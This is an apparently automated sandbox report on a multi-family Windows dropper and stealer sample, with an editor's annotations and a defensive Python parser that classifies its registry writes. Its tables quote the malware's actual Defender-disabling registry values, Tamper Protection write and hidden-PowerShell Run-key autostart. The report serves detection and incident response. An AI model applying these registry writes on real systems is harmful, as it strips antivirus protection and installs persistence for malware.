Malware Analysis Report

2025-06-16 01:30

Sample ID 231031-k13pmafb4s
Target 3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4
SHA256 3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4
Tags
amadey glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4

Threat Level: Known bad

The file 3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4 was found to be: Known bad.

Malicious Activity Summary

amadey glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

SectopRAT payload

Amadey

Detect ZGRat V1

Glupteba

Raccoon Stealer payload

Glupteba payload

Raccoon

RedLine payload

ZGRat

Modifies Windows Defender Real-time Protection settings

SectopRAT

RedLine

SmokeLoader

Modifies Windows Firewall

Blocklisted process makes network request

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Windows security modification

Executes dropped EXE

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Detected potential entity reuse from brand paypal.

Launches sc.exe

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

outlook_office_path

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 09:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 09:04

Reported

2023-10-31 09:07

Platform

win10v2004-20231020-en

Max time kernel

76s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A (3 identical rows; no per-hit details recorded)

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A (6 identical rows; no per-hit details recorded)

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A (3 identical rows; no per-hit details recorded)

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A (11 identical rows; no per-hit details recorded)

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

The file is the hosts file, not a driver; the signature fires on the drivers\ path prefix. A rewritten hosts file pins chosen hostnames to addresses of the malware's choosing, typically to block security-update or telemetry domains or to redirect traffic, so compare it against a clean copy during response.

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6AA9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4B3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2240.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFEB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\98.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4B3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\793.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2240.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\255E.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4385.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6180.exe N/A
N/A N/A C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A

The 9375CFF0413111d3B88A00104B2A6676 subkey is where Outlook and the Windows Messaging Subsystem keep account settings, including stored mail-server credentials. 58B5.exe walks it for every Office version from 12.0 to 16.0, which is credential harvesting rather than discovery.

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\255E.exe'\"" C:\Users\Admin\AppData\Local\Temp\255E.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\FFEB.exe N/A

The wextract_cleanupN RunOnce entries are written by Microsoft's wextract self-extractor stub (the IXPnnn.TMP extraction directories are its signature) to delete the extraction directory at the next logon; they are cleanup, not persistence, although five nested layers (IXP000 to IXP004) show a deliberately layered dropper. The one real autostart is the Run\socks5 value, which relaunches 255E.exe through a hidden PowerShell window at every logon of that user.
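Read together, the Defender Real-Time Protection rows, the TamperProtection write and the Run/RunOnce rows above are the sample's defence-evasion and persistence footprint, and the same row layout carries all three. The Python below is an added example by the editor, not code from the report or from the sandbox vendor: it parses rows in this page's layout, maps each Defender policy value to the protection it turns off (descriptions paraphrased from Microsoft's Defender policy documentation), separates the wextract_cleanupN RunOnce entries (self-extractor cleanup) from real autostarts, and tags writes that went through WOW6432Node. The sample rows are copied from the tables above. Two caveats are encoded as assumptions rather than facts: the WOW6432Node prefix shows the writer was a 32-bit process, and whether the 64-bit Defender service sees a value written there depends on whether that subkey is shared with or redirected from the 64-bit view, so the output only asks you to check the other view; and on a host with Tamper Protection enforced, Defender itself is meant to reject the Features\TamperProtection write, so its succeeding in the sandbox says more about the analysis VM than about the technique's effectiveness in the field.

```python
"""Translate sandbox registry-write rows into what each write does.

Added example (the editor's, not the report's).  Row layout on this page:
    Set value (int|str) <key>\\<value> = "<data>" <process> <target>
"""
import re
from dataclasses import dataclass

# Policy values under ...\Policies\Microsoft\Windows Defender\Real-Time Protection;
# 1 disables the named protection.  Descriptions are the editor's paraphrase.
RTP_POLICY_VALUES = {
    "DisableRealtimeMonitoring": "real-time scanning",
    "DisableBehaviorMonitoring": "behaviour monitoring",
    "DisableIOAVProtection": "scanning of downloaded files and attachments",
    "DisableOnAccessProtection": "on-access file scanning",
    "DisableScanOnRealtimeEnable": "catch-up scan when real-time protection is re-enabled",
}
RTP_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
FEATURES_KEY = r"HKLM\SOFTWARE\Microsoft\Windows Defender\Features"
_RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
_HIVES = {"\\REGISTRY\\MACHINE\\": "HKLM\\", "\\REGISTRY\\USER\\": "HKU\\"}
# The process path is matched greedily so the final token becomes the Target column.
_ROW = re.compile(r'^Set value \((?:int|str)\) (?P<fullpath>.+?) = "(?P<data>.*?)" '
                  r'(?P<process>.+) (?P<target>\S+)$')


@dataclass
class RegistryWrite:
    key: str        # short hive name, WOW6432Node component removed
    name: str
    data: str
    process: str
    wow64: bool     # logged path went through WOW6432Node, i.e. a 32-bit writer


@dataclass
class Finding:
    process: str
    key: str
    name: str
    severity: str   # "high" or "info"
    effect: str


def parse_write(line):
    """RegistryWrite for a 'Set value' row; None for 'Key created' and other rows."""
    m = _ROW.match(line.strip())
    if not m:
        return None
    key, _, name = m.group("fullpath").rpartition("\\")
    for nt_prefix, short in _HIVES.items():
        if key.startswith(nt_prefix):
            key = short + key[len(nt_prefix):]
            break
    wow64 = "\\WOW6432Node\\" in key
    return RegistryWrite(key.replace("\\WOW6432Node\\", "\\"), name,
                         m.group("data"), m.group("process"), wow64)


def evaluate(lines):
    findings = []
    for line in lines:
        w = parse_write(line)
        if w is None:
            continue
        k = w.key.lower()
        if k == RTP_KEY.lower() and w.name in RTP_POLICY_VALUES and w.data == "1":
            f = Finding(w.process, w.key, w.name, "high", "disables " + RTP_POLICY_VALUES[w.name])
        elif k == FEATURES_KEY.lower() and w.name == "TamperProtection" and w.data == "0":
            f = Finding(w.process, w.key, w.name, "high", "tries to switch Tamper Protection off")
        elif _RUN_KEY.search(w.key):
            # wextract (IExpress) self-extractors register this RunOnce entry to delete
            # their IXPnnn.TMP extraction directory at next logon: cleanup, not persistence.
            if w.name.startswith("wextract_cleanup") and "advpack.dll,DelNodeRunDLL32" in w.data:
                f = Finding(w.process, w.key, w.name, "info", "wextract self-extractor cleanup")
            else:
                f = Finding(w.process, w.key, w.name, "high", "autostart persistence: " + w.data)
        else:
            continue
        if w.wow64:   # assumption to verify per subkey: shared with, or redirected from, the 64-bit view
            f.effect += " [written through WOW6432Node by a 32-bit process; check the 64-bit view]"
        findings.append(f)
    return findings


# Rows copied from this report's tables; the 'Key created' row is there to show it is skipped.
SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\FFEB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\255E.exe'\"" C:\Users\Admin\AppData\Local\Temp\255E.exe N/A
""".strip().splitlines()

if __name__ == "__main__":
    for f in evaluate(SAMPLE_ROWS):
        print(f"[{f.severity}] {f.name}: {f.effect}  ({f.process})")
```

Run it as a script to print one line per write, or feed evaluate() the rows of any report in the same layout. Rows whose Description is Key created or Key opened are skipped on purpose: only value writes change behaviour, and the function returns nothing for them.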

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LAudioConverter\is-MTBG1.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-I5DVV.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\LAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-P5NQB.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-OKVMN.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-H7EGQ.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-K5EH6.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-4BLH5.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-GFO65.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-TQBPD.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-8GLCV.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-P8543.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-L1JEV.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-CGRPF.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-V6UKA.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-UM1HT.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A (2 identical rows)
N/A N/A C:\Windows\Explorer.EXE N/A (62 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6180.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A (31 identical rows)
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A (30 identical rows)

Identical rows are grouped with their counts. The three SeDebugPrivilege rows are the ones to follow up: that privilege lets a process open and write to processes it would otherwise be denied access to, and three of the dropped executables enabled it. The Explorer.EXE SeShutdownPrivilege and SeCreatePagefilePrivilege rows are routine shell activity.

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (25 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AA9.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (24 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4020 wrote to memory of 4404 (6 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 3032 (3 identical rows) N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FFEB.exe
PID 3092 wrote to memory of 4784 (3 identical rows) N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\98.exe
PID 3032 wrote to memory of 1368 (3 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\FFEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe
PID 1368 wrote to memory of 944 (3 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe
PID 3092 wrote to memory of 3392 (2 identical rows) N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3092 wrote to memory of 1764 (3 identical rows) N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\28E.exe
PID 944 wrote to memory of 1732 (3 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe
PID 3092 wrote to memory of 3160 (3 identical rows) N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\36A.exe
PID 1732 wrote to memory of 5112 (3 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe
